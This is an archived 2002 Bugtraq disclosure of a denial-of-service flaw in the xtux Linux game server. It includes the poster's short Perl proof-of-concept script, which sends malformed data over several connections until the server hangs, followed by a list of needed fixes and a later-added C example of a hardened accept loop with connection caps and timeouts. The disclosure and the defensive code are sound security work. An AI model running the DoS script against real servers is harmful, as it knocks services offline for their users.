8125013 2002-03-09 15:53 -0700  /46 lines/ b0iler _ <b0iler@hotmail.com>
Sent by: joel@lysator.liu.se
Imported: 2002-03-11  19:55  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <21344>
Subject: xtux server DoS.
------------------------------------------------------------
From: "b0iler _" <b0iler@hotmail.com>
To: bugtraq@securityfocus.com
Message-ID: <F2797jtrSByh133tYwl00016d20@hotmail.com>

After telnetting into an xtux server a few times and typing random
stuff I noticed the server stopped responding. Xtux is a really cool
game for linux, you should try it. It also took up 70% CPU before I
killed it. Then I coded a small Perl script to test this; it worked
every time I tested it. I emailed the author of xtux a few days ago,
haven't heard anything yet. I figure the problems that need to be
addressed are:

- the number of connections from one host: currently unlimited.
- the total number of connections: currently unlimited.
- some sort of timeout for the server: currently the client handles
  timeouts, but the server allows clients to stay connected without
  doing anything forever.
- a fix for when users send garbage (don't make the connection
  correctly) to the server and it becomes unresponsive.

For now I would just set tight firewall rules when you run the xtux
server; you should know who you are playing with anyway.

Here is the Perl script I used to test it:

#!/usr/bin/perl
#
# xtux server DoS - by b0iler
# server will become unresponsive and takes up lots of CPU.
#
# usage: perl xtux-dos.pl <host> <port>

use strict;
use warnings;
use IO::Socket;

my ($host, $port) = @ARGV;
die "usage: $0 <host> <port>\n" unless defined $host and defined $port;

my @socks;  # hold every socket so all the connections stay open
for my $n (1..3) { #you shouldn't even need all 3 connections.
        print "Connecting to $host port $port\n";
        my $sock = IO::Socket::INET->new(PeerAddr => $host,
                                         PeerPort => $port,
                                         Proto    => 'tcp')
            or do { print "\ncouldn't connect\n\n"; next };
        sleep 3;
        # a malformed handshake: this is what wedges the server
        print $sock "garbage data\n\n";
        push @socks, $sock;
}
exit;

http://b0iler.advknowledge.net


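The four server-side fixes the post asks for (a per-host cap, a total cap, a timeout, and not wedging on garbage) as one small poll()-based accept loop. This is an added example written for this page; it is not xtux code and not the poster's, and the greeting format "HELLO <name>", the default port 8390 and the limit values are assumptions made here, since the post does not describe the real xtux protocol.

```c
/* Added example: not from the original post and not xtux code. A poll()
 * accept loop with the limits the post asks for: per-host cap, total cap,
 * handshake/idle timeout, and dropping clients whose first line is not a
 * valid greeting instead of spinning on it.
 * ASSUMED: the greeting "HELLO <name>" and port 8390 are made up here. */
#include <arpa/inet.h>
#include <ctype.h>
#include <netinet/in.h>
#include <poll.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <time.h>
#include <unistd.h>

enum { MAX_CONNS = 16, MAX_PER_HOST = 2, IDLE_TIMEOUT = 30, HANDSHAKE_TIMEOUT = 5 };

struct conn { int fd; uint32_t host; time_t last_seen; int greeted; };
struct table { struct conn c[MAX_CONNS]; int n; };

static int count_host(const struct table *t, uint32_t host) {
    int k = 0;
    for (int i = 0; i < t->n; i++) if (t->c[i].host == host) k++;
    return k;
}

/* Admission policy: the total cap and the per-host cap. */
int admit(const struct table *t, uint32_t host) {
    return t->n < MAX_CONNS && count_host(t, host) < MAX_PER_HOST;
}

/* Register a connection; returns its slot, or -1 if the policy rejects it. */
int table_add(struct table *t, int fd, uint32_t host, time_t now) {
    if (!admit(t, host)) return -1;
    t->c[t->n] = (struct conn){ fd, host, now, 0 };
    return t->n++;
}

/* Remove slot i (the last slot moves into it); returns the fd to close. */
int table_remove(struct table *t, int i) {
    int fd = t->c[i].fd;
    t->c[i] = t->c[--t->n];
    return fd;
}

/* Assumed greeting "HELLO <name>\n", name = 1..16 printable non-space
 * chars. The post's "garbage data" fails this and the client is dropped. */
int valid_greeting(const char *line, size_t len) {
    if (len < 7 || memcmp(line, "HELLO ", 6) != 0) return 0;
    size_t n = len - 6;
    if (line[len - 1] == '\n') n--;             /* ignore the trailing newline */
    if (n < 1 || n > 16) return 0;
    for (size_t i = 6; i < 6 + n; i++)
        if (!isgraph((unsigned char)line[i])) return 0;
    return 1;
}

/* Timeout policy: an ungreeted client gets HANDSHAKE_TIMEOUT seconds to
 * send its greeting; a greeted one may idle for IDLE_TIMEOUT seconds. */
int expired(const struct conn *c, time_t now) {
    time_t limit = c->greeted ? IDLE_TIMEOUT : HANDSHAKE_TIMEOUT;
    return now - c->last_seen > limit;
}

int main(int argc, char **argv) {
    int port = argc > 1 ? atoi(argv[1]) : 8390, one = 1;   /* port: assumption */
    int ls = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in sa = { .sin_family = AF_INET, .sin_port = htons(port) };
    sa.sin_addr.s_addr = htonl(INADDR_ANY);
    setsockopt(ls, SOL_SOCKET, SO_REUSEADDR, &one, sizeof one);
    if (bind(ls, (struct sockaddr *)&sa, sizeof sa) < 0 || listen(ls, 8) < 0) {
        perror("listen"); return 1;
    }
    struct table t = { .n = 0 };
    for (;;) {
        struct pollfd pf[MAX_CONNS + 1];
        pf[0] = (struct pollfd){ ls, POLLIN, 0 };
        for (int i = 0; i < t.n; i++) pf[i + 1] = (struct pollfd){ t.c[i].fd, POLLIN, 0 };
        int old = t.n;                          /* pf[1..old] mirror t.c[0..old-1] */
        if (poll(pf, old + 1, 1000) < 0) { perror("poll"); return 1; }
        time_t now = time(NULL);
        if (pf[0].revents & POLLIN) {
            struct sockaddr_in ca; socklen_t cl = sizeof ca;
            int fd = accept(ls, (struct sockaddr *)&ca, &cl);
            if (fd >= 0 && table_add(&t, fd, ca.sin_addr.s_addr, now) < 0)
                close(fd);                      /* over a cap: refuse, do not queue */
        }
        /* Walk downward so removing slot i (which pulls the last slot into
         * it) never disturbs a slot that has not been visited yet. */
        for (int i = old - 1; i >= 0; i--) {
            struct conn *c = &t.c[i];
            char buf[256];
            int drop = expired(c, now);
            if (!drop && (pf[i + 1].revents & (POLLIN | POLLHUP | POLLERR))) {
                ssize_t r = read(c->fd, buf, sizeof buf);
                if (r <= 0) drop = 1;           /* peer closed or error */
                else if (!c->greeted) drop = !(c->greeted = valid_greeting(buf, (size_t)r));
                if (!drop) c->last_seen = now;  /* real game traffic would be parsed here */
            }
            if (drop) close(table_remove(&t, i));
        }
    }
}
```

Against this loop the Perl script above behaves differently on every count: the third connection from the same host is refused at accept() time, "garbage data" closes that connection instead of leaving the server spinning, and a client that connects and stays silent is dropped after HANDSHAKE_TIMEOUT seconds. The read() treats whatever arrives first as the greeting; a real server would buffer up to the newline before validating.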